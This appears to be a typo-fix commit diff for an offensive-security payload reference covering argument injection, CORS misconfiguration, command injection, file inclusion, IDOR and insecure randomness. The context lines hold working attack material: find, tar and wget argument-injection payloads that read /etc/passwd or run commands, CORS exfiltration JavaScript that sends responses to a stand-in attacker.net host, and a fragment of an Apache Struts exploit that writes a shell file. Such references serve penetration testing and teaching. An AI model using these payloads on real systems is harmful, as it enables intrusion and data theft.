Fix typos

Argument Injection/README.md

@@ -1,4 +1,5 @@
 # Argument Injection
+
 Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
 
 It can happen in different situations, where you can only inject arguments to a command:
@@ -7,7 +8,8 @@ It can happen in different situations, where you can only inject arguments to a
 - Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
 - Bash expansion (ex: *)
 
-In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
+In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:*
+
 ```py
 from shlex import quote,split
 import sys
@@ -19,14 +21,19 @@ if __name__=="__main__":
     print(command)
     r = subprocess.Popen(command)
 ```
+
 It is possible for an attacker to pass several words to abuse options from ```curl``` command
+
 ```ps1
 python python_rce.py "https://www.google.fr -o test.py" 
 ```
-We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
+
+We can see by printing the command that all the parameters are split allowing to inject an argument that will save the response in an arbitrary file.
+
 ```ps1
 ['curl', 'https://www.google.fr', '-o', 'test.py']
 ```
+
 ## Summary
 
 * [List of exposed commands](#list-of-exposed-commands)
@@ -40,6 +47,7 @@ We can see by printing the command that all the parameters are splited allowing
 ## List of exposed commands
 
 ### CURL
+
 It is possible to abuse ```curl``` through the following options:
 
 ```ps1
@@ -49,45 +57,57 @@ It is possible to abuse ```curl``` through the following options:
 In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
 
 ### TAR
+
 For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
 
 Argument injection can happen into the '''extract''' command:
+
 ```ps1
 --to-command <command>
 --checkpoint=1 --checkpoint-action=exec=<command>
 -T <file> or --files-from <file>
 ```
 
 Or in the '''create''' command:
+
 ```ps1
 -I=<program> or -I <program>
 --use-compres-program=<program>
 ```
+
 There are also short options to work without spaces:
+
 ```ps1
 -T<file>
 -I"/path/to/exec"
 ```
 
 ### FIND
+
 Find some_file inside /tmp directory.
+
 ```php
 $file = "some_file";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 
 Print /etc/passwd content.
+
 ```php
 $file = "sth -or -exec cat /etc/passwd ; -quit";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 
 ### WGET
+
 Example of vulnerable code
+
 ```php
 system(escapeshellcmd('wget '.$url));
 ```
+
 Arbitrary file write
+
 ```php
 $url = '--directory-prefix=/var/www/html http://example.com/example.php';
 ```

CORS Misconfiguration/README.md

@@ -56,7 +56,7 @@ req.withCredentials = true;
 req.send();
 
 function reqListener() {
-    location='//atttacker.net/log?key='+this.responseText; 
+    location='//attacker.net/log?key='+this.responseText; 
 };
 ```
 
@@ -174,7 +174,7 @@ req.open('get','https://api.internal.example.com/endpoint',true);
 req.send();
 
 function reqListener() {
-    location='//atttacker.net/log?key='+this.responseText; 
+    location='//attacker.net/log?key='+this.responseText; 
 };
 ```
 
@@ -210,7 +210,7 @@ req.withCredentials = true;
 req.send();
 
 function reqListener() {
-    location='//atttacker.net/log?key='+this.responseText; 
+    location='//attacker.net/log?key='+this.responseText; 
 };
 ```
 
@@ -243,7 +243,7 @@ req.withCredentials = true;
 req.send();
 
 function reqListener() {
-    location='//atttacker.net/log?key='+this.responseText; 
+    location='//attacker.net/log?key='+this.responseText; 
 };
 ```
 

CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py

@@ -114,7 +114,7 @@ def validador():
                             urllib.request.urlopen(host+pwnd(str(shellfile)))
                             shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
                             if shell.read().find(pathsave+"status.php") != -1:
-                                print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
+                                print(BOLD+GREEN+"\nCreate File Successful :) ["+pathsave+"status.php]\n"+ENDC)
                             else:
                                 print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
 

Client Side Path Traversal/README.md

@@ -14,7 +14,7 @@ Since every request is initiated from within the frontend of the application, th
 
 ![](https://matanber.com/images/blog/cspt-query-param.png)
 
-A post-serving page calls the fetch function, sending a request to a URL with attacker-controlled input which is not properly encoded in its path, allowing the attacker to inject `../` sequences to the path and make the request get sent to an arbitrary endpoint. This behavior is refered to as a CSPT vulnerability.
+A post-serving page calls the fetch function, sending a request to a URL with attacker-controlled input which is not properly encoded in its path, allowing the attacker to inject `../` sequences to the path and make the request get sent to an arbitrary endpoint. This behavior is referred to as a CSPT vulnerability.
 
 **Example**:
 

Command Injection/README.md

@@ -136,7 +136,7 @@ Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github
 
 ### Bypass without space
 
-* `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a seperator in commands like `ls`, `wget`; use `${IFS}` instead. 
+* `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a separator in commands like `ls`, `wget`; use `${IFS}` instead. 
   ```powershell
   cat${IFS}/etc/passwd
   ls${IFS}-la

File Inclusion/Files/LFI2RCE.py

@@ -38,7 +38,7 @@
 
 for c in base64_payload[::-1]:
         filters += conversions[c] + "|"
-        # decode and reencode to get rid of everything that isn't valid base64
+        # decode and re-encode to get rid of everything that isn't valid base64
         filters += "convert.base64-decode|"
         filters += "convert.base64-encode|"
         # get rid of equal signs

File Inclusion/README.md

@@ -2,7 +2,7 @@
 
 > A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
 
-**File Inclusion Vulnerability** should be differenciated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
+**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
 
 ## Summary
 

Insecure Direct Object References/README.md

@@ -55,7 +55,7 @@ https://example.com/profile?user_id=124
 
 ### Numeric Value Parameter
 
-Increment and decrement these values to access sensitive informations.
+Increment and decrement these values to access sensitive information.
 
 * Decimal value: `287789`, `287790`, `287791`, ...
 * Hexadecimal: `0x4642d`, `0x4642e`, `0x4642f`, ...
@@ -109,7 +109,7 @@ Sometimes we see websites using hashed values to generate a random user id or to
 
 ### Wildcard Parameter
 
-Send a wilcard instead of an ID, some backend might respond with the data of all the users.
+Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respond with the data of all the users.
 
 * `GET /api/users/* HTTP/1.1`
 * `GET /api/users/% HTTP/1.1`

Insecure Randomness/README.md

@@ -25,7 +25,7 @@ The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.
 |----------|--------|
 | 0 | Only `00000000-0000-0000-0000-000000000000` |
 | 1 | based on time, or clock sequence |
-| 2 | reserved in the RFC 4122, but ommitted in many implementations |
+| 2 | reserved in the RFC 4122, but omitted in many implementations |
 | 3 | based on a MD5 hash |
 | 4 | randomly generated |
 | 5 | based on a SHA1 hash |
@@ -157,7 +157,7 @@ Other bad ideas that are sometimes shipped into production.
 
 Generic identification and sandwitch attack: 
 
-* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Unsecure time-based secret exploitation and Sandwich attack implementation Resources
+* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
     ```ps1
     reset-tolkien detect 660430516ffcf -d "Wed, 27 Mar 2024 14:42:25 GMT" --prefixes "[email protected]" --suffixes "[email protected]" --timezone "-7"
     reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format="uniqid"